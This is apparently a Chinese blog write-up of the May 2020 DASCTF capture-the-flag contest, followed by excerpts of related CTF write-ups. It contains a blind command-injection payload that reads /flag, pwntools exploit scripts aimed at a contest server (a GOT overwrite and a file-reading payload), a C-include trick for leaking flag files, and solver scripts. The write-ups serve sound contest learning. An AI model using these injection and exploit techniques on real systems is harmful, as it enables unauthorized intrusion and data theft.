5月DASCTF

最新推荐文章于 2025-07-19 19:19:50 发布
最新推荐文章于 2025-07-19 19:19:50 发布
阅读量1.3k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 学习 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37433000/article/details/106318215

帮帮小红吧

命令盲注是我没有想到的

cat /flag |grep 'BJD{' || sleep(3);

密码bbcrypto

题目

# -*- coding:utf-8 -*-
import A,SALT
from itertools import *

def encrypt(m, a, si):
    c=""
    for i in range(len(m)):
        c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2)
    return c
if __name__ == "__main__":
    m = 'flag{********************************}'
    a = A
    salt = SALT
    assert(len(salt)==3)
    assert(salt.isalpha())
    si = cycle(salt.lower())
    print("鏄庢枃鍐呭涓猴細")
    print(m)
    print("鍔犲瘑鍚庣殑瀵嗘枃涓猴細")
    c=encrypt(m, a, si)
    print(c)
    #鍔犲瘑鍚庣殑瀵嗘枃涓猴細
    #177401504b0125272c122743171e2c250a602e3a7c206e014a012703273a3c0160173a73753d

可以看到需要求明文需要知道2个未知数,并且它们与明文的关系是线性的直接上z3爆破即可
大概5秒钟就出来了


from z3 import *
from itertools import *

flag=''
salt="ahh"
si=cycle(salt.lower())
c="\x17t\x01PK\x01%',\x12'C\x17\x1e,%\n`.:| n\x01J\x01'\x03':<\x01`\x17:su="
for i in range(len(c)):
	x=Int('x')
	sol=Solver()
	a=(x*-71+ord(next(si)))%128
	sol.add(x>0)
	sol.add(x<128)
	sol.add(a==ord(c[i]))
	print ord(c[i])
	sol.check()
	flag+=chr(int(str(sol.model())[-4:].replace(']','')))
	print flag

pwn

#!/usr/bin/python2
from pwn import *

#p=process('./Memory_Monster_I')
p=remote('183.129.189.60',10083)
elf=ELF('./Memory_Monster_I')
libc=elf.libc
bin_sh=0x402010
p.sendafter(':',p64(elf.got['__stack_chk_fail'])+'\x00'*0x60)
p.sendafter(':',p64(0x040124A))
p.interactive()


#!/usr/bin/python2
from pwn import *

p=remote('183.129.189.60',10078)
context(arch='amd64',os='linux')
shellcode='''
#include <stdio.h>
char en[]="0ipnf0dug0gmbh";

int main(){
int i;
char buf[40];
FILE *fp;
for(i=0;i<14;i++)
{
  en[i]=en[i]-1;
}
fp=fopen(en,"r");
printf("%s\\n",en);
if(fp==NULL)
printf("nonono");
fgets(buf,40,(FILE*)fp);
printf("%s\\n",buf);
fclose(fp);
 return 0;
}
'''
p.sendafter("@')",shellcode+'@')
p.interactive()

上一个万能的这又是我没想到的

#include "/home/ctf/fl\
ag"@

ViQinere

主要逻辑就很简单
在这里插入图片描述
读入flag文件然后判断大写小写数字特殊字符,如果是大写就会-0x41小写就会-0x61(相当于在字母表的位置)然后异或0x7f与一个字符串再取其对应的位置就行了
(这里我直接吧特殊符号和数字给关了反正不影响
exp:

yiq="TaQini"
key2="zyxwvutsrqponmlkjihgfedcba"
v5=0
z=[]
aim=[]
flag="fqd{gfjuj5ublrwjzjpverxkiazzlvo0xta!cwnllasy3b0ievey}"
for i in range(len(flag)):
	a=ord(yiq[v5&5])
	if a>96 and a<=122:
		a=a-97
	elif a<=64 or a>90:
		a=a
	else:
		a=a-0x41
	print hex(a)
	c=ord(flag[i])-97
	print c
	b=((a&0x7f)+c)%26  #c=(b-a&0x7f)
	print b
	aim+=key2[b]
	v5+=1
print aim

输出的全是小写自己在改改就行了)

六月DASCTFre方面wp
weixin_43990313的博客
06-28 457
T0p Gear 题目是upx壳,先用upx脱壳后载入ida。 观察程序的逻辑。有三个关键check,分别进入观察逻辑。 check1(其中sub_401080是相等的比较函数)这段flag的结果就是字符串(注意字符串的顺序) 其实看汇编代码更直接一些。 check2,这是一个aes加密,对字符串进行加密然后和输入的数据进行比较。 可以直接在call这一位置下断,观察rax寄存器的情况。gdb调试下断即可。 查看rax寄存器的内容,得到字符串。 check3同理 拼接起来得到fag c92bb
2021 DASCTF X BUUOJ 五月大联动WP
lifanxin的博客
05-30 2008
DASCTF X BUUOJ 五月大联动WP概述pwnDASCTF_X_BUUOJ_2021_ticketDASCTF_X_BUUOJ_2021_cardre总结 概述   这个五月我又参加了一次不留痕迹的ctf比赛,之所以叫不留痕迹,是因为总是拿不到好的名次????,比赛结束前1小时还能苟进前10,不过后面还是被反超了。不好在安慰自己,新手嘛,刚刚上路,稳扎稳打,持续努力,定有收获。   这个比赛完整环境可以在buuoj上找到,简单分析一下题目分布情况,pwn 2道,re 2道,web 2道,crypto
2020五月赛DASCTF
cwr1499640048的博客
07-01 1151
bbcrypto # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return c if __name__ == "__main__": m = 'flag{**
DASCTF 2025上半年赛|MISC全解
zerorzeror的博客
06-23 979
获得p值:519a73ca97a9e3ea,MD5后取前16位:d14d8ce94563e71a,后续AES解密的Key,题目要提交root的密码,通常在返回数据中。导出35MB的index.php,发现包含Base64编码,解码后是7z文件,解压缩得到secret.vmdk,RStudio加载,发现BitLocker加密。得到解压缩密码:infernityのpc,发现无法解压缩,盲猜是大小写的问题,生成所有大小写的密码字典。导出一堆文件,直接查看Request的汇总,最后出现了与flag有关的注入请求。
2022DASCTF MAY Power cookie
a1563361185的博客
05-22 493
进入题目场景 如图所示 点击login by guest 得到如图所示 显示游客不可用,再由题目的给出的提示可以知道,只有管理员有资格访问 按F12进入控制台,输入document.cookie查看cookie,得到 (这里本来应当是空格,但我自己写过了所以只改回了0,效果一样的) 输入document.cookie="admin=1".得到管理员 接着刷新界面 得到flag ...
DASCTF 5月 Re - ViQinere
T_Luffy的博客
05-24 611
没太有时间打CTF了,就做了一个题,看到师傅们都是逆出结果的,写一下这题我的新奇思路吧,比较节省时间。 ViQinere ida分析发现是对flag文件中的明文进行了处理,创建一个flag文件,本来想添加测试串测试自己的解密思路是否正确,运行,得到测试加密的密文(常规的思路可以开逆了,逻辑也是比较清晰,大师傅们都写了,不再重复。)我手贱把密文又写进了flag文件,然后运行逆回了明文,太好了,完事了。。(逃。。菜????的快乐就是这么简单 我nc拿到了密文,将密文写到了flag文件,运行,得到flag…
DASCTF2024八月-pwn部分题解
qq_41683953的博客
08-24 710
DASCTF2024八月开学季,PWN,clock,randArray
DASCTF 三月赛 逆向replace】
chuxuezhewocao的博客
07-01 438
2021年DASCTF三月赛逆向部分的学习,这个题又是一道程序运行时修改了特定函数的保护属性,从而在函数内部写入了其他函数的内存地址,达到跳转的目的,之前好像遇到过类似的题目,但这个题目一开始仍然没有分析出来,后面看了其他师傅的WP后有了思路,从头到尾独立完成了下,在此做一记录。题目上来一看,貌似逻辑挺简单: 貌似很简单,然后bytes.fromhex,异或回去,得到了一个 很好假flag,意料之中,怎么可能这么简单,然后就不会了,之后学习了一下,关键地方还是在: 这里1这部分是获取了IsDebuggerP
DASCTF三月赛
weixin_44687621的博客
04-10 3346
DASCTF2022.3部分题目 Web ezpop 题目源码如下 <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin {
安恒月赛-DASCTF之Reverse
q_mrlucky的博客
06-02 1369
前言:逆向题真的做到雨露均沾! 入门reverse 按照以往的套路IDA载入,再F5(但是做题要仔细,此题是32位的程序)]当时做题时拖入IDA 64位F5后没反应,憨憨的我纠结了半个小时,一度怀疑F5坏了之后换了32位载入正常显示如图所示因作为签到题,不会太复杂,大致看一下猜是输入,v5的异或处理,用Python写个代码试一下果然,猜对了,就是这么爽! 也可用C++编译一下结果编译运行后一样也可以出flag 0X02 encrypt3刚看到这题时属实有点懵,怎么那么多行,仔细看一下,关键点在数字上,分析一
DASCTF 2024 七月赛 web Sanic‘s revenge&&ciscn 2024 sanic的复盘
weixin_73307794的博客
08-05 999
第一次看到sanic其实是不知所措的,感觉这个虽然是眼熟,但也仅限于眼熟,显而易见的,国赛没有做出来,也因为一些心态问题没有做复盘,时隔近两月,慢慢调整好心态后终于是借着gxn师傅的Sanic revenge进行了整体的复盘这里放上gxn师傅的博客。
DASCTF 上半年赛官方WP
最新发布
小杉泽的博客
07-19 99
本文总结了多道CTF赛题的详细解题思路和代码实现,涵盖Web安全、逆向工程、密码学和杂项等多个领域。主要内容包括: Web安全部分: 通过Jersey框架路由解析绕过认证机制 利用H2 JDBC RCE漏洞实现命令执行 分析Java反序列化漏洞利用链 PHP单行注释绕过和Redis密码爆破 逆向工程部分: Qt程序逆向和音频文件分析 ARM架构固件分析和漏洞利用 Android Native层Hook和加密算法分析 密码学部分: 针对LZW压缩算法的选择明文攻击 ECDSA签名共用nonce漏洞利用 广义R
2023年楚慧杯(DASCTF)WP
ZJPC007的博客
12-18 1374
怎么说呢,就是感觉比赛时间有点紧,3个小时15道题,然后还要结束前提交wp,就有点来不及,当时提交的wp还是匆匆一写。还有一个槽点就是这个比赛的时候不能看实时排名,只能依靠积分来盲猜,这多少有点难受(我们队有段时间积分掉到0.7我还以为要淘汰了。。。最后以一题之差屈居第二。
DASCTF 2024暑期挑战赛wp
渗透测试研究中心
10-07 1698
WEB题目:Sanic's revenge解题步骤首先看到给出的附件:from sanic import Sanicimport osfrom sanic.response import text, htmlimport sysimport randomimport pydash# pydash==5.1.2# 这里的源码好像被admin删掉了一些,听他说里面藏有大秘密class Pollute...
wp 篇 DASCTF Thinkphp 3.2.3RCE复现
这周末在做梦的博客
08-09 2026
一,概述 在我开始这篇博客之前,请允许我说明一下"wp篇"存在的意义——它的存在主要是为了丰富我的“小破站”而存在的,你没听错,我还有一个小破站,如果你想要看看的话,可以私信我。(为什么不公开?因为,我并不是经常维护,而且里面放的题目都需要手动打开…总之就是怕麻烦)。 好了,接下来进入正题。首先给大家推荐这篇漏洞通报 ThinkPHP3.2.x RCE漏洞通报 。 其次,至于DASCTF这道easythinkphp,参加了比赛的都知道怎么回事了,没有参加的也没事,可以根据下面的阐述自己复现(大佬请勿入坑,不
python xlrd对excel文件的读取
xu19950525的博客
10-09 600
XLRD库主要是对文件进行读取,写文件一般用xlwt库,该库遵循 ”读取修改覆盖“ 的原则。 import xlrd # 打开文件 workbook = xlrd.open_workbook('C:/Users/Administrator/Desktop/s4.xlsx') sheet2_name = workbook.sheet_names() # 获取所有sheet名称 prin...
Dasctf web 2道题的wp
Airwooh的博客
08-02 485
就出了两道web 太菜了 总排名44 eur1ka yyds web1 Google 搜了一下 是前几天爆出的一个洞 直接打就出来了 web2 <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); .
DASCTF 2024金秋十月赛RE题wp
sln_1550的博客
10-20 1154
3题RE,差一点就AK了,可能好久没打比赛了,技能有所下降,还是需要经常摸一摸工具。
DASCTF2020-7月赛 部分wp(misc,pwn,crypto)
ATFWUS的博客
07-25 2159
五个小时,刚好把杂项,密码学,pwn的签到题做出来了,哈哈哈,wp记录一下。 比赛时间:2020-07-25 10:00-15:00 0x01.MISC - welcome to the misc world 文件下载 :链接:https://pan.baidu.com/s/1QfoFQUORH5n0zTEdHNXiAw 提取码:FWUS 考点: 1.lsb隐写与zsteg的使用 2.Nfts隐写 3.base85加密 下载得到的是一个rar文件。 解压的得到一张图片和一个压缩包,压缩包.
DASCTF RSA
01-24
### DASCTF竞赛中的RSA加密挑战与解决方案 在网络安全竞赛如DASCTF中,RSA加密相关的挑战通常涉及密码学原理的应用以及对常见攻击手段的理解。对于此类比赛中的RSA题目,参赛者需掌握多种技巧来应对不同类型的难题。 #### 基础概念理解 RSA是一种基于大整数分解困难性的公钥加密算法。其安全性依赖于两个大素数相乘容易而因式分解难这一事实。比赛中常见的任务可能包括但不限于私钥恢复、密文破解或是利用特定漏洞实施攻击[^1]。 #### 解决方案概述 针对DASCTF或其他类似平台上的RSA类目下的具体问题,可以采取如下几种策略: - **低指数广播攻击**:当相同的明文被发送给多个接收方,并且这些接收方都使用较小的公开指数e时,则可以通过中国剩余定理(CRT)求得原始消息m。 ```python from sympy import mod_inverse def low_exponent_attack(ciphertexts, n_values): m = sum([c * (N // ni) * pow(mod_inverse(N // ni, ni), e, N) for c, ni in zip(ciphertexts, n_values)]) % N return int(m).to_bytes((int(m).bit_length() + 7)//8,'big') ``` - **共模攻击**:如果同一份数据分别用不同的公钥(e,N),但是共享同一个模块n进行了两次以上的加密操作,那么就可以通过简单的计算得到原信息。 ```python def common_modulus_attack(cipher_1, cipher_2, exponent_1, exponent_2, modulus): s1 = pow(exponent_2, -1, phi(modulus)) s2 = (-exponent_1 * s1) % phi(modulus) result = ((pow(cipher_1,s1,modulus)*pow(cipher_2,s2,modulus))%modulus)**(1//gcd(s1,phi(modulus))) return long_to_bytes(result) ``` - **部分私钥泄露攻击**:假设已知p或q的一部分位数,或者是d的部分比特序列,这将大大降低暴力枚举所需的时间复杂度。 ```python def partial_private_key_leak(p_part, q_part=None): # Assuming p_part is a significant portion of the prime factor. factors = [] while True: candidate_p = next_prime(int.from_bytes(p_part, 'little')) if not(q_part): break candidate_q = next_prime(int.from_bytes(q_part, 'little')) if gcd(candidate_p*candidate_q,n)==candidate_p*candidate_q: factors.append(candidate_p);factors.append(candidate_q); break; d = inverseMod(pow(e,-1,(candidate_p-1)*(candidate_q-1)),phi(n)) private_key=(d,candidate_p,candidate_q) return private_key ``` 以上仅列举了一些基础的方法,在实际比赛中还需要考虑更多复杂的场景和技术细节。值得注意的是,上述代码片段仅为示意用途,在真实环境中应更加严谨地处理边界条件等问题。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值